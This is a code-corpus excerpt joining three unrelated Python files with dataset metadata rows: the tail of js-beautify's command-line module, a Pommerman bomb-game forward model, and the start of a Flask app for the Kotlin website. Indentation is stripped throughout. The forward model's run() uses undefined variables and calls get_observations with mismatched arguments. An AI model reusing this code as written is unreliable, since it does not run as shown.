and (self.last_type in ['TK_START_BLOCK', 'TK_START_EXPR', 'TK_EQUALS', 'TK_OPERATOR'] \
or self.flags.last_text in self.line_starters or self.flags.last_text == ',')):
space_before = False
space_after = False
if self.flags.last_text == ';' and self.is_expression(self.flags.mode):
# for (;; ++i)
# ^^
space_before = True
if self.last_type == 'TK_RESERVED':
space_before = True
if self.flags.mode == MODE.BlockStatement and self.flags.last_text in ['{', ';']:
# { foo: --i }
# foo(): --bar
self.append_newline()
elif token_text == ':':
if self.flags.ternary_depth == 0:
if self.flags.mode == MODE.BlockStatement:
self.flags.mode = MODE.ObjectLiteral
space_before = False
else:
self.flags.ternary_depth -= 1
elif token_text == '?':
self.flags.ternary_depth += 1
elif self.token_text == '*' and self.last_type == 'TK_RESERVED' and self.flags.last_text == 'function':
space_before = False
space_after = False
if space_before:
self.output_space_before_token = True
self.append_token(token_text)
if space_after:
self.output_space_before_token = True
def handle_block_comment(self, token_text):
lines = token_text.replace('\x0d', '').split('\x0a')
javadoc = False
# block comment starts with a new line
self.append_newline(preserve_statement_flags = True)
if len(lines) > 1:
if not any(l for l in lines[1:] if ( l.strip() == '' or (l.lstrip())[0] != '*')):
javadoc = True
# first line always indented
self.append_token(lines[0])
for line in lines[1:]:
self.append_newline(preserve_statement_flags = True)
if javadoc:
# javadoc: reformat and re-indent
self.append_token(' ' + line.strip())
else:
# normal comments output raw
self.output_lines[-1].text.append(line)
self.append_newline(preserve_statement_flags = True)
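# Illustrative example (added for clarity, not part of the original source):
# a block comment is treated as "javadoc" style when every continuation line
# starts with '*', e.g.
#   /**
#    * Frobnicates the widget.
#    */
# Such comments are re-indented line by line; any other block comment is
# emitted verbatim, preserving its original layout.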
def handle_inline_comment(self, token_text):
self.output_space_before_token = True
self.append_token(token_text)
self.output_space_before_token = True
def handle_comment(self, token_text):
if self.input_wanted_newline:
self.append_newline(preserve_statement_flags = True)
if not self.input_wanted_newline:
self.trim_output(True)
self.output_space_before_token = True
self.append_token(token_text)
self.append_newline(preserve_statement_flags = True)
def handle_dot(self, token_text):
if self.start_of_statement():
# The conditional starts the statement if appropriate.
pass
if self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text):
self.output_space_before_token = True
else:
# allow preserved newlines before dots in general
# force newlines on dots after close paren when break_chained - for bar().baz()
self.allow_wrap_or_preserved_newline(token_text,
self.flags.last_text == ')' and self.opts.break_chained_methods)
self.append_token(token_text)
def handle_unknown(self, token_text):
self.append_token(token_text)
if token_text[-1] == '\n':
self.append_newline()
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
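# Hypothetical invocation of the command-line interface defined in main() below
# (the script/entry-point name is an assumption; the flags mirror the getopt
# spec parsed there):
#   python jsbeautifier.py --indent-size=2 --brace-style=collapse -o out.js in.js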
def main():
argv = sys.argv[1:]
try:
opts, args = getopt.getopt(argv, "s:c:o:dEPjbkil:xhtfvXw:",
['indent-size=','indent-char=','outfile=', 'disable-preserve-newlines',
'space-in-paren', 'space-in-empty-paren', 'jslint-happy', 'brace-style=',
'keep-array-indentation', 'indent-level=', 'unescape-strings', 'help', 'usage',
'stdin', 'eval-code', 'indent-with-tabs', 'keep-function-indentation', 'version',
'e4x', 'wrap-line-length='])
except getopt.GetoptError as ex:
print(ex, file=sys.stderr)
return usage(sys.stderr)
js_options = default_options()
file = None
outfile = 'stdout'
if len(args) == 1:
file = args[0]
for opt, arg in opts:
if opt in ('--keep-array-indentation', '-k'):
js_options.keep_array_indentation = True
if opt in ('--keep-function-indentation','-f'):
js_options.keep_function_indentation = True
elif opt in ('--outfile', '-o'):
outfile = arg
elif opt in ('--indent-size', '-s'):
js_options.indent_size = int(arg)
elif opt in ('--indent-char', '-c'):
js_options.indent_char = arg
elif opt in ('--indent-with-tabs', '-t'):
js_options.indent_with_tabs = True
elif opt in ('--disable-preserve-newlines', '-d'):
js_options.preserve_newlines = False
elif opt in ('--space-in-paren', '-P'):
js_options.space_in_paren = True
elif opt in ('--space-in-empty-paren', '-E'):
js_options.space_in_empty_paren = True
elif opt in ('--jslint-happy', '-j'):
js_options.jslint_happy = True
elif opt in ('--eval-code',):
js_options.eval_code = True
elif opt in ('--brace-style', '-b'):
js_options.brace_style = arg
elif opt in ('--unescape-strings', '-x'):
js_options.unescape_strings = True
elif opt in ('--e4x', '-X'):
js_options.e4x = True
elif opt in ('--wrap-line-length', '-w'):
js_options.wrap_line_length = int(arg)
elif opt in ('--stdin', '-i'):
file = '-'
elif opt in ('--version', '-v'):
return print(__version__)
elif opt in ('--help', '--usage', '-h'):
return usage()
if not file:
print("Must define at least one file.", file=sys.stderr)
return usage(sys.stderr)
else:
try:
if outfile == 'stdout':
print(beautify_file(file, js_options))
else:
mkdir_p(os.path.dirname(outfile))
with open(outfile, 'w') as f:
f.write(beautify_file(file, js_options) + '\n')
except Exception as ex:
print(ex, file=sys.stderr)
return 1
# Success
return 0
| 44.059501 | 4,249 | 0.583228 | [
"MIT"
] | fedmich/js-beautify | python/jsbeautifier/__init__.py | 68,865 | Python |
'''Module to manage and advanced game state'''
from collections import defaultdict
import numpy as np
from . import constants
from . import characters
from . import utility
class ForwardModel(object):
"""Class for helping with the [forward] modeling of the game state."""
def run(self,
num_times,
board,
agents,
bombs,
items,
flames,
is_partially_observable,
agent_view_size,
action_space,
training_agent=None,
is_communicative=False):
"""Run the forward model.
Args:
num_times: The number of times to run it for. This is a maximum and
it will stop early if we reach a done.
board: The board state to run it from.
agents: The agents to use to run it.
bombs: The starting bombs.
items: The starting items.
flames: The starting flames.
is_partially_observable: Whether the board is partially observable or
not. Only applies to TeamRadio.
agent_view_size: If it's partially observable, then the size of the
square that the agent can view.
action_space: The actions that each agent can take.
training_agent: The training agent to pass to done.
is_communicative: Whether the action depends on communication
observations as well.
Returns:
steps: The list of step results, which are each a dict of "obs",
"next_obs", "reward", "action".
board: Updated board.
agents: Updated agents, same models though.
bombs: Updated bombs.
items: Updated items.
flames: Updated flames.
done: Whether we completed the game in these steps.
info: The result of the game if it's completed.
"""
steps = []
for _ in range(num_times):
obs = self.get_observations(
board, agents, bombs, is_partially_observable, agent_view_size)
actions = self.act(
agents, obs, action_space, is_communicative=is_communicative)
board, agents, bombs, items, flames = self.step(
actions, board, agents, bombs, items, flames)
next_obs = self.get_observations(
board, agents, bombs, is_partially_observable, agent_view_size)
reward = self.get_rewards(agents, game_type, step_count, max_steps)
done = self.get_done(agents, step_count, max_steps, game_type,
training_agent)
info = self.get_info(done, reward, game_type, agents)
steps.append({
"obs": obs,
"next_obs": next_obs,
"reward": reward,
"actions": actions,
})
if done:
# Callback to let the agents know that the game has ended.
for agent in agents:
agent.episode_end(reward[agent.agent_id])
break
return steps, board, agents, bombs, items, flames, done, info
@staticmethod
def act(agents, obs, action_space, is_communicative=False):
"""Returns actions for each agent in this list.
Args:
agents: A list of agent objects.
obs: A list of matching observations per agent.
action_space: The action space for the environment using this model.
is_communicative: Whether the action depends on communication
observations as well.
Returns a list of actions.
"""
def act_ex_communication(agent):
'''Handles agent's move without communication'''
if agent.is_alive:
return agent.act(obs[agent.agent_id], action_space=action_space)
else:
return constants.Action.Stop.value
def act_with_communication(agent):
'''Handles agent's move with communication'''
if agent.is_alive:
action = agent.act(
obs[agent.agent_id], action_space=action_space)
if type(action) == int:
action = [action] + [0, 0]
assert (type(action) == list)
return action
else:
return [constants.Action.Stop.value, 0, 0]
ret = []
for agent in agents:
if is_communicative:
ret.append(act_with_communication(agent))
else:
ret.append(act_ex_communication(agent))
return ret
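# Illustrative return values (not from the original source): without
# communication each entry is a single move, e.g. constants.Action.Stop.value
# (0) for a dead agent; with is_communicative=True each entry is a triple
# [move, message_1, message_2], so the same dead agent yields [0, 0, 0].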
@staticmethod
def step(actions,
curr_board,
curr_agents,
curr_bombs,
curr_items,
curr_flames,
max_blast_strength=10):
board_size = len(curr_board)
# Tick the flames. Replace any dead ones with passages. If there is an
# item there, then reveal that item.
flames = []
for flame in curr_flames:
position = flame.position
if flame.is_dead():
item_value = curr_items.get(position)
if item_value:
del curr_items[position]
else:
item_value = constants.Item.Passage.value
curr_board[position] = item_value
else:
flame.tick()
flames.append(flame)
curr_flames = flames
# Redraw all current flames
# Multiple flames may share a position and the map should contain
# a flame until all flames are dead to avoid issues with bomb
# movements and explosions.
for flame in curr_flames:
curr_board[flame.position] = constants.Item.Flames.value
# Step the living agents and moving bombs.
# If two agents try to go to the same spot, they should bounce back to
# their previous spots. This is complicated with one example being when
# there are three agents all in a row. If the one in the middle tries
# to go to the left and bounces with the one on the left, and then the
# one on the right tried to go to the middle one's position, she should
# also bounce. A way of doing this is to gather all the new positions
# before taking any actions. Then, if there are disputes, correct those
# disputes iteratively.
# Additionally, if two agents try to switch spots by moving into each
# Figure out desired next position for alive agents
alive_agents = [agent for agent in curr_agents if agent.is_alive]
desired_agent_positions = [agent.position for agent in alive_agents]
for num_agent, agent in enumerate(alive_agents):
position = agent.position
# We change the curr_board here as a safeguard. We will later
# update the agent's new position.
curr_board[position] = constants.Item.Passage.value
action = actions[agent.agent_id]
if action == constants.Action.Stop.value:
pass
elif action == constants.Action.Bomb.value:
position = agent.position
if not utility.position_is_bomb(curr_bombs, position):
bomb = agent.maybe_lay_bomb()
if bomb:
curr_bombs.append(bomb)
elif utility.is_valid_direction(curr_board, position, action):
desired_agent_positions[num_agent] = agent.get_next_position(
action)
# Gather desired next positions for moving bombs. Handle kicks later.
desired_bomb_positions = [bomb.position for bomb in curr_bombs]
for num_bomb, bomb in enumerate(curr_bombs):
curr_board[bomb.position] = constants.Item.Passage.value
if bomb.is_moving():
desired_position = utility.get_next_position(
bomb.position, bomb.moving_direction)
if utility.position_on_board(curr_board, desired_position) \
and not utility.position_is_powerup(curr_board, desired_position) \
and not utility.position_is_wall(curr_board, desired_position):
desired_bomb_positions[num_bomb] = desired_position
# Position switches:
# Agent <-> Agent => revert both to previous position.
# Bomb <-> Bomb => revert both to previous position.
# Agent <-> Bomb => revert Bomb to previous position.
crossings = {}
def crossing(current, desired):
'''Checks to see if an agent is crossing paths'''
current_x, current_y = current
desired_x, desired_y = desired
if current_x != desired_x:
assert current_y == desired_y
return ('X', min(current_x, desired_x), current_y)
assert current_x == desired_x
return ('Y', current_x, min(current_y, desired_y))
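# Worked example (illustrative): an agent at (2, 3) moving to (2, 4) and an
# agent at (2, 4) moving to (2, 3) both map to the border ('Y', 2, 3), so the
# swap is detected and both are reverted to their previous positions.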
for num_agent, agent in enumerate(alive_agents):
if desired_agent_positions[num_agent] != agent.position:
desired_position = desired_agent_positions[num_agent]
border = crossing(agent.position, desired_position)
if border in crossings:
# Crossed another agent - revert both to prior positions.
desired_agent_positions[num_agent] = agent.position
num_agent2, _ = crossings[border]
desired_agent_positions[num_agent2] = alive_agents[
num_agent2].position
else:
crossings[border] = (num_agent, True)
for num_bomb, bomb in enumerate(curr_bombs):
if desired_bomb_positions[num_bomb] != bomb.position:
desired_position = desired_bomb_positions[num_bomb]
border = crossing(bomb.position, desired_position)
if border in crossings:
# Crossed - revert to prior position.
desired_bomb_positions[num_bomb] = bomb.position
num, is_agent = crossings[border]
if not is_agent:
# Crossed bomb - revert that to prior position as well.
desired_bomb_positions[num] = curr_bombs[num].position
else:
crossings[border] = (num_bomb, False)
# Deal with multiple agents or multiple bomb collisions on desired next
# position by resetting desired position to current position for
# everyone involved in the collision.
agent_occupancy = defaultdict(int)
bomb_occupancy = defaultdict(int)
for desired_position in desired_agent_positions:
agent_occupancy[desired_position] += 1
for desired_position in desired_bomb_positions:
bomb_occupancy[desired_position] += 1
# Resolve >=2 agents or >=2 bombs trying to occupy the same space.
change = True
while change:
change = False
for num_agent, agent in enumerate(alive_agents):
desired_position = desired_agent_positions[num_agent]
curr_position = agent.position
# Either another agent is going to this position or more than
# one bomb is going to this position. In both scenarios, revert
# to the original position.
if desired_position != curr_position and \
(agent_occupancy[desired_position] > 1 or bomb_occupancy[desired_position] > 1):
desired_agent_positions[num_agent] = curr_position
agent_occupancy[curr_position] += 1
change = True
for num_bomb, bomb in enumerate(curr_bombs):
desired_position = desired_bomb_positions[num_bomb]
curr_position = bomb.position
if desired_position != curr_position and \
(bomb_occupancy[desired_position] > 1 or agent_occupancy[desired_position] > 1):
desired_bomb_positions[num_bomb] = curr_position
bomb_occupancy[curr_position] += 1
change = True
# Handle kicks.
agent_indexed_by_kicked_bomb = {}
kicked_bomb_indexed_by_agent = {}
delayed_bomb_updates = []
delayed_agent_updates = []
# Loop through all bombs to see if they need a good kicking or cause
# collisions with an agent.
for num_bomb, bomb in enumerate(curr_bombs):
desired_position = desired_bomb_positions[num_bomb]
if agent_occupancy[desired_position] == 0:
# There was never an agent around to kick or collide.
continue
agent_list = [
(num_agent, agent) for (num_agent, agent) in enumerate(alive_agents) \
if desired_position == desired_agent_positions[num_agent]]
if not agent_list:
# Agents moved from collision.
continue
# The agent_list should contain a single element at this point.
assert (len(agent_list) == 1)
num_agent, agent = agent_list[0]
if desired_position == agent.position:
# Agent did not move
if desired_position != bomb.position:
# Bomb moved, but agent did not. The bomb should revert
# and stop.
delayed_bomb_updates.append((num_bomb, bomb.position))
continue
# NOTE: At this point, we have that the agent in question tried to
# move into this position.
if not agent.can_kick:
# If we move the agent at this point, then we risk having two
# agents on a square in future iterations of the loop. So we
# push this change to the next stage instead.
delayed_bomb_updates.append((num_bomb, bomb.position))
delayed_agent_updates.append((num_agent, agent.position))
continue
# Agent moved and can kick - see if the target for the kick never had anyhing on it
direction = constants.Action(actions[agent.agent_id])
target_position = utility.get_next_position(desired_position,
direction)
if utility.position_on_board(curr_board, target_position) and \
agent_occupancy[target_position] == 0 and \
bomb_occupancy[target_position] == 0 and \
not utility.position_is_powerup(curr_board, target_position) and \
not utility.position_is_wall(curr_board, target_position):
# Ok to update bomb desired location as we won't iterate over it again here
# but we can not update bomb_occupancy on target position and need to check it again
# However we need to set the bomb count on the current position to zero so
# that the agent can stay on this position.
bomb_occupancy[desired_position] = 0
delayed_bomb_updates.append((num_bomb, target_position))
agent_indexed_by_kicked_bomb[num_bomb] = num_agent
kicked_bomb_indexed_by_agent[num_agent] = num_bomb
bomb.moving_direction = direction
# Bombs may still collide and we then need to reverse bomb and agent ..
else:
delayed_bomb_updates.append((num_bomb, bomb.position))
delayed_agent_updates.append((num_agent, agent.position))
for (num_bomb, bomb_position) in delayed_bomb_updates:
desired_bomb_positions[num_bomb] = bomb_position
bomb_occupancy[bomb_position] += 1
change = True
for (num_agent, agent_position) in delayed_agent_updates:
desired_agent_positions[num_agent] = agent_position
agent_occupancy[agent_position] += 1
change = True
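# Illustrative outcome of the kick handling above (not from the original
# source): an agent with can_kick stepping onto a bomb's square sends the bomb
# one square further in the agent's direction, provided that target square is
# on the board and free of agents, bombs, power-ups and walls; otherwise both
# the bomb and the agent are reverted via the delayed updates applied here.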
while change:
change = False
for num_agent, agent in enumerate(alive_agents):
desired_position = desired_agent_positions[num_agent]
curr_position = agent.position
# Agents and bombs can only share a square if they are both in their
# original position (Agent dropped bomb and has not moved)
if desired_position != curr_position and \
(agent_occupancy[desired_position] > 1 or bomb_occupancy[desired_position] != 0):
# Late collisions resulting from failed kicks force this agent to stay at the
# original position. Check if this agent successfully kicked a bomb above and undo
# the kick.
if num_agent in kicked_bomb_indexed_by_agent:
num_bomb = kicked_bomb_indexed_by_agent[num_agent]
bomb = curr_bombs[num_bomb]
desired_bomb_positions[num_bomb] = bomb.position
bomb_occupancy[bomb.position] += 1
del agent_indexed_by_kicked_bomb[num_bomb]
del kicked_bomb_indexed_by_agent[num_agent]
desired_agent_positions[num_agent] = curr_position
agent_occupancy[curr_position] += 1
change = True
for num_bomb, bomb in enumerate(curr_bombs):
desired_position = desired_bomb_positions[num_bomb]
curr_position = bomb.position
# This bomb may be a boomerang, i.e. it was kicked back to the
# original location it moved from. If it is blocked now, it
# can't be kicked and the agent needs to move back to stay
# consistent with other movements.
if desired_position == curr_position and num_bomb not in agent_indexed_by_kicked_bomb:
continue
bomb_occupancy_ = bomb_occupancy[desired_position]
agent_occupancy_ = agent_occupancy[desired_position]
# Agents and bombs can only share a square if they are both in their
# original position (Agent dropped bomb and has not moved)
if bomb_occupancy_ > 1 or agent_occupancy_ != 0:
desired_bomb_positions[num_bomb] = curr_position
bomb_occupancy[curr_position] += 1
num_agent = agent_indexed_by_kicked_bomb.get(num_bomb)
if num_agent is not None:
agent = alive_agents[num_agent]
desired_agent_positions[num_agent] = agent.position
agent_occupancy[agent.position] += 1
del kicked_bomb_indexed_by_agent[num_agent]
del agent_indexed_by_kicked_bomb[num_bomb]
change = True
for num_bomb, bomb in enumerate(curr_bombs):
if desired_bomb_positions[num_bomb] == bomb.position and \
not num_bomb in agent_indexed_by_kicked_bomb:
# Bomb was not kicked this turn and its desired position is its
# current location. Stop it just in case it was moving before.
bomb.stop()
else:
# Move bomb to the new position.
# NOTE: We already set the moving direction up above.
bomb.position = desired_bomb_positions[num_bomb]
for num_agent, agent in enumerate(alive_agents):
if desired_agent_positions[num_agent] != agent.position:
agent.move(actions[agent.agent_id])
if utility.position_is_powerup(curr_board, agent.position):
agent.pick_up(
constants.Item(curr_board[agent.position]),
max_blast_strength=max_blast_strength)
# Explode bombs.
exploded_map = np.zeros_like(curr_board)
has_new_explosions = False
for bomb in curr_bombs:
bomb.tick()
if bomb.exploded():
has_new_explosions = True
elif curr_board[bomb.position] == constants.Item.Flames.value:
bomb.fire()
has_new_explosions = True
# Chain the explosions.
while has_new_explosions:
next_bombs = []
has_new_explosions = False
for bomb in curr_bombs:
if not bomb.exploded():
next_bombs.append(bomb)
continue
bomb.bomber.incr_ammo()
for _, indices in bomb.explode().items():
for r, c in indices:
if not all(
[r >= 0, c >= 0, r < board_size, c < board_size]):
break
if curr_board[r][c] == constants.Item.Rigid.value:
break
exploded_map[r][c] = 1
if curr_board[r][c] == constants.Item.Wood.value:
break
curr_bombs = next_bombs
for bomb in curr_bombs:
if bomb.in_range(exploded_map):
bomb.fire()
has_new_explosions = True
# Update the board's bombs.
for bomb in curr_bombs:
curr_board[bomb.position] = constants.Item.Bomb.value
# Update the board's flames.
flame_positions = np.where(exploded_map == 1)
for row, col in zip(flame_positions[0], flame_positions[1]):
curr_flames.append(characters.Flame((row, col)))
for flame in curr_flames:
curr_board[flame.position] = constants.Item.Flames.value
# Kill agents on flames. Otherwise, update position on curr_board.
for agent in alive_agents:
if curr_board[agent.position] == constants.Item.Flames.value:
agent.die()
else:
curr_board[agent.position] = utility.agent_value(agent.agent_id)
return curr_board, curr_agents, curr_bombs, curr_items, curr_flames
def get_observations(self, curr_board, agents, bombs,
is_partially_observable, agent_view_size,
game_type, game_env):
"""Gets the observations as an np.array of the visible squares.
The agent gets to choose whether it wants to keep the fogged part in
memory.
"""
board_size = len(curr_board)
def make_bomb_maps(position):
''' Makes an array of an agents bombs and the bombs attributes '''
blast_strengths = np.zeros((board_size, board_size))
life = np.zeros((board_size, board_size))
for bomb in bombs:
x, y = bomb.position
if not is_partially_observable \
or in_view_range(position, x, y):
blast_strengths[(x, y)] = bomb.blast_strength
life[(x, y)] = bomb.life
return blast_strengths, life
def in_view_range(position, v_row, v_col):
'''Checks to see if a tile is in an agents viewing area'''
row, col = position
return all([
row >= v_row - agent_view_size, row <= v_row + agent_view_size,
col >= v_col - agent_view_size, col <= v_col + agent_view_size
])
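# Example of the visibility rule above (illustrative): with agent_view_size = 4
# an agent at (5, 5) can see tile (9, 9), but tile (10, 5) lies outside the
# 9x9 window and is replaced with Fog in its observation.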
attrs = [
'position', 'blast_strength', 'can_kick', 'teammate', 'ammo',
'enemies'
]
alive_agents = [
utility.agent_value(agent.agent_id)
for agent in agents
if agent.is_alive
]
observations = []
for agent in agents:
agent_obs = {'alive': alive_agents}
board = curr_board
if is_partially_observable:
board = board.copy()
for row in range(board_size):
for col in range(board_size):
if not in_view_range(agent.position, row, col):
board[row, col] = constants.Item.Fog.value
agent_obs['board'] = board
bomb_blast_strengths, bomb_life = make_bomb_maps(agent.position)
agent_obs['bomb_blast_strength'] = bomb_blast_strengths
agent_obs['bomb_life'] = bomb_life
agent_obs['game_type'] = game_type.value
agent_obs['game_env'] = game_env
for attr in attrs:
assert hasattr(agent, attr)
agent_obs[attr] = getattr(agent, attr)
observations.append(agent_obs)
return observations
@staticmethod
def get_done(agents, step_count, max_steps, game_type, training_agent):
# print('get_done called...', training_agent)
alive = [agent for agent in agents if agent.is_alive]
alive_ids = sorted([agent.agent_id for agent in alive])
if step_count >= max_steps:
print('gameover : max timestep over')
return True
elif game_type == constants.GameType.FFA:
if training_agent is not None and training_agent not in alive_ids:
print('gameover : ffa training_agent has died')
return True
if len(alive) <= 1:
print('checkout : ffa only %s player survived' % len(alive))
return len(alive) <= 1
elif len(alive_ids) <= 1:
print('gameover : only one player survived')
return True
elif alive_ids == [0, 2]:
print('gameover : [0,2] team won')
return True
elif alive_ids == [1, 3]:
print('gameover : [1,3] team won')
return True
return False
@staticmethod
def get_info(done, rewards, game_type, agents):
if game_type == constants.GameType.FFA:
alive = [agent for agent in agents if agent.is_alive]
if done:
if len(alive) != 1:
# Either we have more than 1 alive (reached max steps) or
# we have 0 alive (last agents died at the same time).
return {
'result': constants.Result.Tie,
}
else:
return {
'result': constants.Result.Win,
'winners': [num for num, reward in enumerate(rewards) \
if reward == 1]
}
else:
return {
'result': constants.Result.Incomplete,
}
elif done:
# We are playing a team game.
if rewards == [-1] * 4:
return {
'result': constants.Result.Tie,
}
else:
return {
'result': constants.Result.Win,
'winners': [num for num, reward in enumerate(rewards) \
if reward == 1],
}
else:
return {
'result': constants.Result.Incomplete,
}
@staticmethod
def get_rewards(agents, game_type, step_count, max_steps):
print('get_rewards called..')
def any_lst_equal(lst, values):
'''Checks if list are equal'''
return any([lst == v for v in values])
alive_agents = [num for num, agent in enumerate(agents) \
if agent.is_alive]
if game_type == constants.GameType.FFA:
if len(alive_agents) == 1:
# An agent won. Give them +1, others -1.
return [2 * int(agent.is_alive) - 1 for agent in agents]
elif step_count >= max_steps:
# Game is over from time. Everyone gets -1.
return [-1] * 4
else:
# Game running: 0 for alive, -1 for dead.
return [int(agent.is_alive) - 1 for agent in agents]
else:
# We are playing a team game.
if any_lst_equal(alive_agents, [[0, 2], [0], [2]]):
# Team [0, 2] wins.
return [1, -1, 1, -1]
elif any_lst_equal(alive_agents, [[1, 3], [1], [3]]):
# Team [1, 3] wins.
return [-1, 1, -1, 1]
elif step_count >= max_steps:
# Game is over by max_steps. All agents tie.
return [-1] * 4
elif len(alive_agents) == 0:
# Everyone's dead. All agents tie.
return [-1] * 4
else:
# No team has yet won or lost.
return [0] * 4
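# Illustrative outcomes of the scheme above (not from the original source): in
# FFA mode, if only agent 2 is alive the rewards are [-1, -1, 1, -1]; in a team
# game where agents 0 and 2 survive, the rewards are [1, -1, 1, -1].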
| 44.561162 | 103 | 0.564801 | [
"Apache-2.0"
] | psyoblade/playground | pommerman/forward_model.py | 29,143 | Python |
import copy
import datetime
import glob
import json
import os
import sys
import threading
from os import path
from urllib.parse import urlparse, urljoin, ParseResult
import xmltodict
import yaml
from bs4 import BeautifulSoup
from flask import Flask, render_template, Response, send_from_directory, request
from flask.views import View
from flask.helpers import url_for, send_file, make_response
from flask_frozen import Freezer, walk_directory
from hashlib import md5
from yaml import FullLoader
from src.Feature import Feature
from src.dist import get_dist_pages
from src.github import assert_valid_git_hub_url
from src.navigation import process_video_nav, process_nav, get_current_url
from src.api import get_api_page
from src.encoder import DateAwareEncoder
from src.externals import process_nav_includes
from src.grammar import get_grammar
from src.markdown.makrdown import jinja_aware_markdown
from src.pages.MyFlatPages import MyFlatPages
from src.pdf import generate_pdf
from src.processors.processors import process_code_blocks
from src.processors.processors import set_replace_simple_code
from src.search import build_search_indices
from src.sitemap import generate_sitemap, generate_temporary_sitemap
from src.ktl_components import KTLComponentExtension
app = Flask(__name__, static_folder='_assets')
app.config.from_pyfile('mysettings.py')
app.jinja_env.trim_blocks = True
app.jinja_env.lstrip_blocks = True
pages = MyFlatPages(app)
freezer = Freezer(app)
ignore_stdlib = False
build_mode = False
build_contenteditable = False
build_check_links = True
build_errors = []
url_adapter = app.create_url_adapter(None)
root_folder = path.join(os.path.dirname(__file__))
data_folder = path.join(os.path.dirname(__file__), "data")
_nav_cache = None
_nav_lock = threading.RLock()
_cached_asset_version = {}
def get_asset_version(filename):
if filename in _cached_asset_version:
return _cached_asset_version[filename]
filepath = (root_folder if root_folder else ".") + filename
if filename and path.exists(filepath):
with open(filepath, 'rb') as file:
digest = md5(file.read()).hexdigest()
_cached_asset_version[filename] = digest
return digest
return None
def get_site_data():
data = {}
for data_file in os.listdir(data_folder):
if data_file.startswith('_'):
continue
if not data_file.endswith(".yml"):
continue
data_file_path = path.join(data_folder, data_file)
with open(data_file_path, encoding="UTF-8") as stream:
try:
file_name_without_extension = data_file[:-4] if data_file.endswith(".yml") else data_file
data[file_name_without_extension] = yaml.load(stream, Loader=FullLoader)
except yaml.YAMLError as exc:
sys.stderr.write('Cant parse data file ' + data_file + ': ')
sys.stderr.write(str(exc))
sys.exit(-1)
except IOError as exc:
sys.stderr.write('Cant read data file ' + data_file + ': ')
sys.stderr.write(str(exc))
sys.exit(-1)
return data
site_data = get_site_data()
def get_nav():
global _nav_cache
global _nav_lock
with _nav_lock:
if _nav_cache is not None:
nav = _nav_cache
else:
nav = get_nav_impl()
nav = copy.deepcopy(nav)
if build_mode:
_nav_cache = copy.deepcopy(nav)
# NOTE. This call depends on `request.path`, cannot cache
process_nav(request.path, nav)
return nav
def get_nav_impl():
with open(path.join(data_folder, "_nav.yml")) as stream:
nav = yaml.load(stream, Loader=FullLoader)
nav = process_nav_includes(build_mode, nav)
return nav
def get_kotlin_features():
features_dir = path.join(os.path.dirname(__file__), "kotlin-features")
features = []
for feature_meta in yaml.load(open(path.join(features_dir, "kotlin-features.yml")), Loader=FullLoader):
file_path = path.join(features_dir, feature_meta['content_file'])
with open(file_path, encoding='utf-8') as f:
content = f.read()
content = content.replace("\r\n", "\n")
if file_path.endswith(".md"):
html_content = BeautifulSoup(jinja_aware_markdown(content, pages), 'html.parser')
content = process_code_blocks(html_content)
features.append(Feature(content, feature_meta))
return features
@app.context_processor
def add_year_to_context():
return {
'year': datetime.datetime.now().year
}
app.jinja_env.add_extension(KTLComponentExtension)
@app.context_processor
def add_data_to_context():
nav = get_nav()
return {
'nav': nav,
'data': site_data,
'site': {
'pdf_url': app.config['PDF_URL'],
'forum_url': app.config['FORUM_URL'],
'site_github_url': app.config['SITE_GITHUB_URL'],
'data': site_data,
'text_using_gradle': app.config['TEXT_USING_GRADLE'],
'code_baseurl': app.config['CODE_URL'],
'contenteditable': build_contenteditable
},
'headerCurrentUrl': get_current_url(nav['subnav']['content'])
}
@app.template_filter('get_domain')
def get_domain(url):
return urlparse(url).netloc
app.jinja_env.globals['get_domain'] = get_domain
@app.template_filter('split_chunk')
def split_chunk(items, size):
return [items[i:i+size] for i in range(len(items))[::size]]
app.jinja_env.globals['split_chunk'] = split_chunk
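# The helper above is registered both as a Jinja filter and a global; an
# illustrative call: split_chunk([1, 2, 3, 4, 5], 2) -> [[1, 2], [3, 4], [5]].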
@app.template_filter('autoversion')
def autoversion_filter(filename):
asset_version = get_asset_version(filename)
if asset_version is None: return filename
original = urlparse(filename)._asdict()
original.update(query=original.get('query') + '&v=' + asset_version)
return ParseResult(**original).geturl()
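# Illustrative effect of the filter above (hash value is made up): for an
# existing file, "/assets/styles.css" becomes "/assets/styles.css?&v=5f3a2c...",
# where the value is the md5 of the file on disk, so browsers re-fetch the
# asset whenever its content changes; if the file cannot be found the path is
# returned unchanged.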
@app.route('/data/events.json')
def get_events():
with open(path.join(data_folder, "events.xml"), encoding="UTF-8") as events_file:
events = xmltodict.parse(events_file.read())['events']['event']
return Response(json.dumps(events, cls=DateAwareEncoder), mimetype='application/json')
@app.route('/data/cities.json')
def get_cities():
return Response(json.dumps(site_data['cities'], cls=DateAwareEncoder), mimetype='application/json')
@app.route('/data/kotlinconf.json')
def get_kotlinconf():
return Response(json.dumps(site_data['kotlinconf'], cls=DateAwareEncoder), mimetype='application/json')
@app.route('/data/universities.json')
def get_universities():
return Response(json.dumps(site_data['universities'], cls=DateAwareEncoder), mimetype='application/json')
@app.route('/data/user-groups.json')
def get_user_groups():
return Response(json.dumps(site_data['user-groups'], cls=DateAwareEncoder), mimetype='application/json')
@app.route('/docs/reference/grammar.html')
def grammar():
grammar = get_grammar(build_mode)
if grammar is None:
return "Grammar file not found", 404
return render_template('pages/grammar.html', kotlinGrammar=grammar)
@app.route('/docs/videos.html')
def videos_page():
return render_template('pages/videos.html', videos=process_video_nav(site_data['videos']))
@app.route('/docs/kotlin-reference.pdf')
def kotlin_reference_pdf():
return send_file(path.join(root_folder, "assets", "kotlin-reference.pdf"))
@app.route('/docs/kotlin-docs.pdf')
def kotlin_docs_pdf():
return send_file(path.join(root_folder, "assets", "kotlin-reference.pdf"))
@app.route('/community/')
def community_page():
return render_template('pages/community.html')
@app.route('/user-groups/user-group-list.html')
def user_group_list():
return render_template(
'pages/user-groups/user-group-list.html',
user_groups_data=site_data['user-groups'],
number_of_groups=sum(map(lambda section: len(section['groups']), site_data['user-groups'])))
@app.route('/education/')
def education_page():
return render_template('pages/education/index.html')
@app.route('/')
def index_page():
features = get_kotlin_features()
return render_template('pages/index.html',
is_index_page=True,
features=features
)
def process_page(page_path):
# get_nav() has side effect to copy and patch files from the `external` folder
# under site folder. We need it for dev mode to make sure file is up-to-date
# TODO: extract get_nav and implement the explicit way to avoid side-effects
get_nav()
page = pages.get_or_404(page_path)
if 'redirect_path' in page.meta and page.meta['redirect_path'] is not None:
